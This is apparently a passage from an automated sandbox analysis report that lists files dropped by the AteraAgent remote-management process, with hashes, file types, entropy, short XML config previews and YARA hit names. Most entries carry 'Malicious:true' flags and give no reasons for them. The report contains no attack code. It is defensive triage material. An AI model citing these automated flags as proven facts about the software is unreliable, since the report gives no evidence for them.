                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWu:3zpjF0/t043e3vggr83jMYa/hU7HxVu
                                                                                                                                                                                                                                                                                                                                  MD5:BDFEF14C7A661E237F27B79E4FE950F6
                                                                                                                                                                                                                                                                                                                                  SHA1:83F7DC1950211EBEC2B326D0778E6A46781CF892
                                                                                                                                                                                                                                                                                                                                  SHA-256:689AF98555A3D5A36FE8841AD39F9196F60A6A5400A8CF41E6E0997F47E675F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:1E698E4E1E6108524F48B6ED7720E0EE239679546FB429F415A52875C8FA0D5C0B2D8C3EE6F523D1B7E875D1FACA83B6A0EB5B62C0DAED414BDCB36FE0D5C043
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179921646668756
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:YP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ils:Yh0qjC5RMOHO420kN1X
                                                                                                                                                                                                                                                                                                                                  MD5:8DDC05CED2922285C9037C7D503A86AA
                                                                                                                                                                                                                                                                                                                                  SHA1:AD66BA39BE8639D86877B515A68EC3D7AD3E7753
                                                                                                                                                                                                                                                                                                                                  SHA-256:30D4499D9F96D1B081C5A8B5F9D9792900DE6767243CBEAD81F6244C33C799E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:6B7E9AC11076C4FAEBF6F51610023BAF0F513DD0680CA2A07DA9AE5E6F6AC42EDBF8CA8F9ED210AC5F3C7D280E8ACBBDAFA4C6916ED2003B9D94693587EEF656
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676696708568243
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Th06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBVmh:Ty9eEpYinAMxCAy
                                                                                                                                                                                                                                                                                                                                  MD5:2D491883E24603B382FDAD8840272070
                                                                                                                                                                                                                                                                                                                                  SHA1:78C442E11EA0B9ED3BBD09B19E6A18CC559CA58E
                                                                                                                                                                                                                                                                                                                                  SHA-256:EDF076BA91F6F5A808879D94A586D1BF78D5D0C8FDCD5399DE36FB6389301886
                                                                                                                                                                                                                                                                                                                                  SHA-512:0790CA5BB187AEFE4E5785C528C68E55EA4AFD642101A77A1D983599BC42AB4423723E910A0265CD9A5D3C7DFE0C9E9794DD6F6E8228B488A384647643C09C79
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332801634669375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:kn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCr/:knvXYcIh6yFIFBYpc47Hxk
                                                                                                                                                                                                                                                                                                                                  MD5:B62DB814A8E1C5C8F4DE32F142D7709F
                                                                                                                                                                                                                                                                                                                                  SHA1:DB5998A9C785E77A1152145615213EA31E06B289
                                                                                                                                                                                                                                                                                                                                  SHA-256:F3E5DDD22B8F044C9B45D99762F2A339077790AB049C1AAB152F70BC7127466E
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F7DAE5AA68ED86A574F70478F99458C4A52B1913D232B20A58045EB1E49C83B9134DD90335FBCBEDEECF691EECE5A137FE06FF9F2F6B9D0607FACEA2C0D7C5B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.955263962444665
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq6L:67N1r9KGI04CCARLq6L
                                                                                                                                                                                                                                                                                                                                  MD5:F0A06E07C21B485434202D325B3AA058
                                                                                                                                                                                                                                                                                                                                  SHA1:6E4A0A572E3CA5A5B23D4633CE63300E3BB39658
                                                                                                                                                                                                                                                                                                                                  SHA-256:955FD5B1B046AFC9E62E2D0CA4698818FE1357EA764977D7A9B4A44C1F657169
                                                                                                                                                                                                                                                                                                                                  SHA-512:B398A6A66F184193CFA635D6B5DBA9ADB391782F2A82F4609ECB161A4340DC41C82F22A98FEB69F594B7DDF9FB677711BE1FBFA4D796146550E92D22DCA14D15
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1799216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.520454988999628
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:GuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFY9:RHmUMohVWpu8ul0UkTgNCfyo3G
                                                                                                                                                                                                                                                                                                                                  MD5:CBA9D50085EE939B987CF758C727DD62
                                                                                                                                                                                                                                                                                                                                  SHA1:DDC0FAF68995883AC754662C59C4295BB0A64E3B
                                                                                                                                                                                                                                                                                                                                  SHA-256:75E47A697A46E31811FAB8C5D9FE1ABA6BA095B6D13DC79A8C848BE308917C37
                                                                                                                                                                                                                                                                                                                                  SHA-512:A5F3D1B96535E0B523ECD71DC36FD3AF157C630874FF11DA29066C545114D256B14A5EE2BA725679C4192182D37DF6900AA69ECE228BAFCE909A482DFF43A1E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1475632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.791868709546672
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:TS3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8qC:6dwXpQdNVNDQubXyi60jXTW98qC
                                                                                                                                                                                                                                                                                                                                  MD5:3B462EFAACFAEBA904109B4FD3FE641F
                                                                                                                                                                                                                                                                                                                                  SHA1:6DB8785E94FDC2152895396CB9B3D3945DA5D25A
                                                                                                                                                                                                                                                                                                                                  SHA-256:1F9F620D4D7D32670073C335A2DC88A5A5DCFA7A5FF18E914EC6CD8EA983105F
                                                                                                                                                                                                                                                                                                                                  SHA-512:7295B1F7E4437729DFDAED5310EB26B5F4A8B96A2B97ADA8F8466712A69946BAADB2588071B51D661F4FD2A6029A2914E3DB73914BD2FE1C74D725F204063EF2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2949915
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998697868047441
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Mx8DF8Dc0YpN5yNXQ5R4oUwmA+QwgINfNZJ8fGI9dKRcv5G7QMgOCod:a8ZZNIdohmfaIvMfGI98mv5G7QMQod
                                                                                                                                                                                                                                                                                                                                  MD5:05974AD24D0FC5005FD90CA96941BEAA
                                                                                                                                                                                                                                                                                                                                  SHA1:7CCF99236729A614CA0D15B7E5A18ECE0DD14242
                                                                                                                                                                                                                                                                                                                                  SHA-256:30215A902C746227DF0D5FED400EAF74A5C1E827D50EEC7C21CD37EA1B299AA5
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9426D56833D61A1763F93CE5388A4C2B5AF3C0AE9A71B200A0A3BAB1937381220D9A981077C2BD286A53FAEBDE764FFE1608729E4D3895A69B2318403B89CA9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.344633184100352
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wpYIrVWGYPHEUePsnhkgGIW7W8feKWDpQ6bo2dNyb8E9VF6IYijSJIVx+Kq:+TrVL3Ue0FSTuVbo2ZEpYi60K
                                                                                                                                                                                                                                                                                                                                  MD5:069A96BB028F6E6703BC960A326ABD59
                                                                                                                                                                                                                                                                                                                                  SHA1:F6264400B1B90539C7616DCCD3A34474AB2DF5E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:6180A8A71ADAE158A4625CC682BB13A6DE635DD3C93C9CDF975114C0112C0D65
                                                                                                                                                                                                                                                                                                                                  SHA-512:4E0B7A8EBD0A7D591D609C787D4EBE44BEA3228D40ACF3E8A346F0A834A993B5AC829D41A19555192CCD4D186222D9A2B2B6D36A2F0A7F42A553511D4901D0D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2006
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                                                                                                                  MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                                                                                                                  SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                                                                                                                  SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):200232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.748268560554506
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Vq1M5sV+q7TAy54+DgSZmtT2tl2g/rPdniqiTj2rRmn9q:0OsVzT7FZl2eLFiqiTjYRV
                                                                                                                                                                                                                                                                                                                                  MD5:84CB0CF784734C3EE8C151BC54F77B6E
                                                                                                                                                                                                                                                                                                                                  SHA1:6F300359BE48F38CA18EA54D744566635FD13E6F
                                                                                                                                                                                                                                                                                                                                  SHA-256:ADACAB8AC34991A5B4908AAFB21A9D0EEF3A24B4A44AC6B48A1AC745623EB2A9
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C628EBAB1720A02B2D2DEE52C805F17B986F3C46A8C91BAC6C67D7A7FAF155DCB1C0A46E208D5B1B7D913F26E81B037E2B9E83D25E65C86CBCA249B26866E34
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1780
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                                                                                                                  MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                                                                                                                  SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                                                                                                                  SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXVLV:WBVh
                                                                                                                                                                                                                                                                                                                                  MD5:92603262EFD6DBD3744A145FF7641A2A
                                                                                                                                                                                                                                                                                                                                  SHA1:E969FDE49A382A2767FC298BA378ADD00CC3D7F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:589B12D3FF5444039F0AC0207F3E9B6B56F8B56E963B092011853EE32F77A60A
                                                                                                                                                                                                                                                                                                                                  SHA-512:68B1D5599038FB809345BC030AE76FD9A3DF60D44F8A051E80C9E199120FF55A4FBFBBD25AC07EFA1826BE889B73AEE5AD486BF68A628D2D75DE38EC94699A95
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=20.0
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102440
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190162435859503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:NPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476q:N2bYbYSWd85I5sSakFQhHLv4B
                                                                                                                                                                                                                                                                                                                                  MD5:6BACDABC6A468943ADA37E5CB69C8FEB
                                                                                                                                                                                                                                                                                                                                  SHA1:22CF4ABBD05B7D25A79ED264F568383E324BD11C
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8C2DA8C7856C8DC2E092CCA8FC401F28386AB9819E8403A433B6F2CA54ECE96
                                                                                                                                                                                                                                                                                                                                  SHA-512:0DB5593EE41B804536F5961E7EFE76B239307736D84CA78D67E7BFB2BDB3C59CCC6E2B6EB49F6E4DBFD58CCCC3DF845F04689714DC436E12768C4AE164D12BDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.996606007806772
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:a4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB766TX:a4auS7S5Ea6WMcpuUBF
                                                                                                                                                                                                                                                                                                                                  MD5:FCE842D9DBBFB5CA0C04270845A64FEB
                                                                                                                                                                                                                                                                                                                                  SHA1:F1045EB750C5FB13E5FF8885B4ADFF05495D1660
                                                                                                                                                                                                                                                                                                                                  SHA-256:25A064F38F3AF9807D35ACAD6E70A5D24E00EC73FA08DC6AFACCFEE653149633
                                                                                                                                                                                                                                                                                                                                  SHA-512:E06E1AF9DBB730352F414A3E91ADFFDCF6C1F8F497F8606538A693E617793A37CD893D83DF738FC7E4163C7754C462696F61C7EC94144DC7204AA8DA7582119A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.652402330503958
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1UXh+/DtY2PLNyby2sE9jBF6IYiYF85S35IVnxGUHFeFlWhK1E9aPu:1UXh+tY2jNyb8E9VF6IYijSJIVxaFCQW
                                                                                                                                                                                                                                                                                                                                  MD5:620338616B011EF94B5C26DE68CABAE7
                                                                                                                                                                                                                                                                                                                                  SHA1:81E598D75DC7A0C94087533BA36676E0DF35AD68
                                                                                                                                                                                                                                                                                                                                  SHA-256:10AF0C95D1ADA19F878CB6A80A70214834C2F36155D67FF5345B4D05CB6BA477
                                                                                                                                                                                                                                                                                                                                  SHA-512:7CA259E7C737C826802DB0AC88CB6D74069C31BE685919D3618E873A5E408D8BCEDDE2392A1E2C2BD88D26FC38804417E16B3323F38E2ED4760A05954C236AA5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75304
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.239824186437336
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYa:wF+qo7mDEwj4NXLGcfgruFcaD76jwG
                                                                                                                                                                                                                                                                                                                                  MD5:C2CB0AD1FA683CB57F40C9382449D41C
                                                                                                                                                                                                                                                                                                                                  SHA1:0B0974C7E74E4E587A4A0D7ACCCD6FC1B96D00DE
                                                                                                                                                                                                                                                                                                                                  SHA-256:36C5BCD5DD2A8E93106700518FBC555840E2D0020CEA1D32A5E64A1270E50A42
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C05DE1A00A1A575284093E90E9794354E25604F582EA8846F2F6FE3D2A0551630E932B01A1CAC018FACA0467FE2710DE977DD9D981EBBE81B1C37B91328D609
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.407169811812939
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:YQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyXXEpYi60y:Y9MYn1seLE8JFMLcyXQ76P
                                                                                                                                                                                                                                                                                                                                  MD5:238778F7D2AE2208C8C7090FACE6C8E6
                                                                                                                                                                                                                                                                                                                                  SHA1:A02EFAB7519B1EE7A0DCF06F12F4312AEFC87FC2
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4A39AF642A0B2CDDC170B9B8BA87CBC78B14D4B97629BEA3F026C6CF329D8C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:11A9D0290E6C4F3F19ACFAE6F8D97849DB17BA7FF825F9CCD59AFD544101886864B49C27A35F25A20C222434F0AFCE61E69D6E1CD5CA7CD85E3279828BD547DC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.203458563070589
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:s9XeDmzV2yzlhKLFU1lLVp1+2flYFnQ6H:gODmZhlNbLVp1+2W
                                                                                                                                                                                                                                                                                                                                  MD5:D64501A8B57B5ED120F55EBE1B90BFF3
                                                                                                                                                                                                                                                                                                                                  SHA1:D34253E7A5FCB1F25547730C0BF0E9C4E8B90EB0
                                                                                                                                                                                                                                                                                                                                  SHA-256:3ED26F6B9D10682BC67C283A2DB82B256B06FA1BC361F44972A5E35E7D9B0E7C
                                                                                                                                                                                                                                                                                                                                  SHA-512:645073336FE310D6A42DB227150088B45FAF6C979D9A54AB9A1F5313F9127FCE85E985211FFF9A946834EC076294A671635588C632B70D63115CE499449DC83E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96296
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.633204431697952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:k2kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhkW76fJJAZF:9QmyxL2L4D+YZL2X7SAaqywjhkWeJAZF
                                                                                                                                                                                                                                                                                                                                  MD5:B713D773EDA4CA777A9B8BDAC07D7701
                                                                                                                                                                                                                                                                                                                                  SHA1:7695C5EFB0C6BE6AB6A0E15668D73919B043B3AF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BC25A66BC435FEBD67800E21C9FB491F587D72A5B4E30E76ABA2549D38463FA9
